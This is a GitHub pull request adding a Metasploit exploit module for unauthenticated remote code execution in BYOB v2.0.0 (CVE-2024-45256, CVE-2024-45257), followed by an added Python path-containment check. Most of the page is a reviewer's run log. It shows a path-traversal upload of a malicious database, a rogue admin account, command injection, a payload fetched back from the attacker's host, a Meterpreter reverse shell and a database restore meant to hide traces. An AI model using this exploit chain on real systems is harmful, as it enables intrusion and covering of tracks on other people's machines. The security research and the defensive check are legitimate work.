Add BYOB Unauthenticated RCE module (CVE-2024-45256, CVE-2024-45257) #19485
…nd command injection (CVE-2024-45256, CVE-2024-45257)
Co-authored-by: Spencer McIntyre <[email protected]>
The changes are as follows
Hello @Chocapikk,
Ok I've retested after the changes, looks good to me.
```
msf6 exploit(unix/webapp/byob_unauth_rce) >
[*] Fetch handler listening on 172.26.52.39:8080
[*] HTTP server started
[*] Adding resource /byobfetch
[*] Started reverse TCP handler on 172.26.52.39:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be BYOB.
[+] The target is vulnerable.
[*] Using URL: http://172.26.52.39:5000/rmTHGJSSF7
[*] Payload is ready at /
[*] Generating malicious SQLite database.
[+] Malicious database uploaded successfully to the following paths: /proc/self/cwd/../../../../buildyourownbotnet/database.db
[*] Registering a new admin user: admin:SsOOH3Tuk9dD
[+] Registered user!
[*] Logging in with the new admin user.
[+] Logged in successfully!
[*] Injecting payload via command injection.
[*] Received request at: / - Client Address: 172.26.60.213
[*] Sending response to 172.26.60.213 for /
[*] Client 172.26.60.213 requested /byobfetch
[*] Sending payload to 172.26.60.213 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.26.60.213
[*] Restoring the database via Meterpreter to avoid leaving traces.
[+] Database has been successfully restored to its clean state.
[*] Meterpreter session 1 opened (172.26.52.39:4444 -> 172.26.60.213:60774) at 2024-10-14 08:14:50 -0400

msf6 exploit(unix/webapp/byob_unauth_rce) > sessions

Active sessions
===============

  Id  Name  Type                   Information           Connection
  --  ----  ----                   -----------           ----------
  1         meterpreter x64/linux  user @ 172.26.60.213  172.26.52.39:4444 -> 172.26.60.213:60774 (172.26.60.213)

msf6 exploit(unix/webapp/byob_unauth_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer     : 172.26.60.213
OS           : LinuxMint 21.3 (Linux 5.15.0-91-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
Release Notes
This adds an exploit module for BYOB unauthenticated RCE (CVE-2024-45256, CVE-2024-45257).
Hello Metasploit Team,
I hope this message finds you well.
I am submitting a new module that exploits two critical vulnerabilities identified in BYOB (Build Your Own Botnet) v2.0.0. These vulnerabilities include an Unauthenticated Arbitrary File Write (CVE-2024-45256) and an Authenticated Command Injection (CVE-2024-45257), which allow attackers to bypass authentication and achieve Remote Code Execution (RCE). The latest BYOB version still remains vulnerable as of today.
Module Overview:
Testing:
This module has been tested against BYOB version 2.0.0 in a Linux Mint environment running Python 3.10.12.
Verification Steps:
exploit/unix/webapp/byob_unauth_rce
Thank you for reviewing this contribution. Looking forward to your feedback!
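
For the arbitrary file write described above, an added example (not part of this PR and not BYOB's code) of a containment check an upload handler can apply before writing. It assumes the handler joins a client-supplied name onto an upload directory; `resolve_upload_path`, `UnsafePath` and `audit` are hypothetical names, and the only value taken from this page is the destination path shown in the module output.

```python
import os

# Destination string taken from the module output quoted in this thread.
PAGE_PATH = "/proc/self/cwd/../../../../buildyourownbotnet/database.db"


class UnsafePath(ValueError):
    """A client-supplied name would be written outside the upload root."""


def resolve_upload_path(upload_root: str, client_name: str) -> str:
    """Return the real destination for client_name or raise UnsafePath."""
    if not client_name or "\x00" in client_name:
        raise UnsafePath("empty name or NUL byte")
    root = os.path.realpath(upload_root)
    # os.path.join() drops upload_root when client_name is absolute, and
    # realpath() follows symlinks (for example /proc/self/cwd), so the
    # comparison is made on where the write would actually land.
    candidate = os.path.realpath(os.path.join(root, client_name))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise UnsafePath(f"{client_name!r} resolves to {candidate!r}")
    return candidate


def audit(upload_root: str, names: list[str]) -> dict[str, str]:
    """Classify each name as 'ok' or 'rejected' (for log review or tests)."""
    verdicts = {}
    for name in names:
        try:
            resolve_upload_path(upload_root, name)
            verdicts[name] = "ok"
        except UnsafePath:
            verdicts[name] = "rejected"
    return verdicts


if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as root:  # constructed upload root
        # Constructed sample names, plus the one path shown on this page.
        samples = ["client.db", "sub/dir/client.db", "../database.db", PAGE_PATH]
        for name, verdict in audit(root, samples).items():
            print(f"{verdict:8}  {name}")
```

The check compares resolved paths rather than strings, so a symlink planted inside the upload root that points elsewhere is rejected as well.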